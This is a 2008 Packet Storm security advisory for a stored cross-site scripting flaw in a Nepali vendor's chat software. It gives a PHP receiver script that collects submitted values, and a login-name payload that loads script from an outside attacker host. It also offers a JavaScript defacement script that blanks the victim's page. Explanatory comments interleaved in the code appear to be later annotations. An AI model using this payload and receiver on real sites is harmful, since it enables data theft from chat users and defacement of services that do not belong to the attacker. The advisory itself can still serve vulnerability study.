wdcs-xss.txt

2008-02-11T00:00:00
ID PACKETSTORM:63477
Type packetstorm
Reporter The-0utl4w
Modified 2008-02-11T00:00:00

Description

                                        
                                            `Aria-Security Team (Persian Security Network)  
httP://Aria-Security.Net  
---------------------------------------------  
Shoutz: Aura, imm0rtal, Soot.Hackers, iM4N,   
A Special Thanks to my dear friend Mh_p0rtal for his great help in order to find this vuln.  
Vendor: http://www.softwebsnepal.com  
Demo: http://www.softwebsnepal.com/website_design_chat_software.htm  
Original Advisory: http://forum.aria-security.net/showthread.php?t=517  
  
First we need a little php file in order to get and save our needed information + A txt file to save them there and chmod must be 777 in order to work  
[code]  
<?php  
// Receiver script from the advisory: it stores one query-string value on disk, then prints a text file as HTML.  
// NOTE(review): presumably the externally hosted script (not shown on this page) sends data from the victim's browser to this endpoint; confirm against the original advisory.  
// Defender view: requests to a third-party host carrying a `text` query parameter are the network-visible trace of this pattern.  
  
// Part 1: runs only when the `text` query parameter is present and truthy.  
if ( $_GET['text'] ) {  
$text = $_GET['text'];  
$filename = "Aria-Security.txt";  
// Mode "w" truncates the file, so each request overwrites whatever was stored before.  
$fp = fopen( $filename, "w" ) or die("Couldn't open $filename");  
// The value is written exactly as received; there is no validation or encoding.  
fwrite( $fp, "$text" );  
fclose( $fp );  
}  
//--------------  
// Part 2: runs on every request and reads test.txt, which is a different file from the one written above.  
$filename = "test.txt";  
$fp = fopen( $filename, "r" ) or die("Couldn't open $filename");  
while ( ! feof( $fp ) )  
{  
// fgets() with a length of 1024 returns at most 1023 bytes per call.  
$line = fgets( $fp, 1024 );  
// Each line is printed without HTML escaping, so any markup stored in the file is rendered by the browser viewing this page.  
print "$line<br>";  
}  
fclose($fp);  
?>  
[/code]  
  
login as:  
<script src=http://Yourwebsite.com/yourfile.js></script>  
(For Script Visit original link)  
  
  
NOT RECOMMENDED: But you can also just upload a "deface page", something like:  
  
  
[code]  
// Inputs for deface() below. "#HEX" is a placeholder in the advisory, not a valid colour value.  
// NOTE(review): the advisory apparently intends this listing to be the external .js loaded by the injected <script src=...> tag; confirm against the original advisory.  
// Defender view: the script can only load if the chat application renders the login name without output encoding and the page allows third-party script sources (no restrictive Content-Security-Policy).  
var title = "Aria-Security.Net";  
var bgcolor = "#HEX";  
var image_url = "http://ariahosting.ir/index.html";  
var text = "The-0utl4w";  
var font_color = "#HEX";  
  
// Function declarations are hoisted, so this call works although deface() is defined further down.  
deface(title, bgcolor, image_url, text, font_color);  
  
// Replaces what the current document displays: title, background colour, a centred text block, an optional image and a footer.  
// Everything here acts on the DOM of the browser that executes the script; nothing in this function changes content on the server.  
// Parameters: pageTitle (string), bgColor (colour string), imageUrl (string), pageText (string inserted as HTML), fontColor (colour string).  
function deface(pageTitle, bgColor, imageUrl, pageText, fontColor) {  
document.title = pageTitle;  
// Removes every existing element from <body>.  
document.body.innerHTML = '';  
document.bgColor = bgColor;  
// Single centred container that receives all inserted elements.  
var overLay = document.createElement("div");  
overLay.style.textAlign = 'center';  
document.body.appendChild(overLay);  
var txt = document.createElement("p");  
txt.style.font = 'normal normal bold 36px Verdana';  
txt.style.color = fontColor;  
// innerHTML parses pageText as markup, not as plain text.  
txt.innerHTML = pageText;  
overLay.appendChild(txt);  
  
// This test reads the outer-scope variable image_url, not the imageUrl parameter.  
if (image_url != "") {  
var newImg = document.createElement("img");  
newImg.setAttribute("border", '0');  
newImg.setAttribute("src", imageUrl);  
overLay.appendChild(newImg);  
}  
  
var footer = document.createElement("p");  
footer.style.font = 'italic normal normal 12px Arial';  
footer.style.color = '#DDDDDD';  
// The footer text comes from the outer-scope variable title, not from the pageTitle parameter.  
footer.innerHTML = title;  
overLay.appendChild(footer);  
}  
[/code]  
  
Regards,  
The-0utl4w   
Credits Goes to Aria-Security Team  
http://Aria-Security.Net  
`